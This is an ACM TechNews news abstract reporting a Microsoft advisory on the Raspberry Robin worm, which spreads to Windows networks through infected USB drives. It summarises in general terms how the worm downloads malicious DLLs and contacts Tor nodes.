acm-header
Sign In

Communications of the ACM

ACM TechNews

Hundreds of Windows Networks Infected with Raspberry Robin Worm


Microsoft flagged Raspberry Robin as a high-risk campaign with good reason, and for now there doesn't seem to be any mitigation process beyond not plugging suspicious USB devices into a Windows network.

Credit: Olemedia/Getty Images

A private threat intelligence advisory issued by Microsoft warns that hundreds of Windows networks are infected with the Raspberry Robin worm.

The worm is spread through infected USB devices. After the user inserts the USB device and clicks the malicious .LNK file, the worm launches an msiexec process and runs a malicious file located on the device.

A short URL is then used to establish a connection with a command and control server, potentially including QNAP NAS devices, which is followed by the download and installation of several malicious dynamic link libraries (DLLs).

The DLLs are executed using the legitimate Windows utility odbcconf.exe as the worm attempts to connect to Tor network nodes.

The actor behind Raspberry Robin has not yet taken advantage of any infected Windows networks, so the goal of the worm remains unknown.

From PC Magazine
View Full Article

 

Abstracts Copyright © 2022 SmithBucklin, Washington, DC, USA


 

No entries found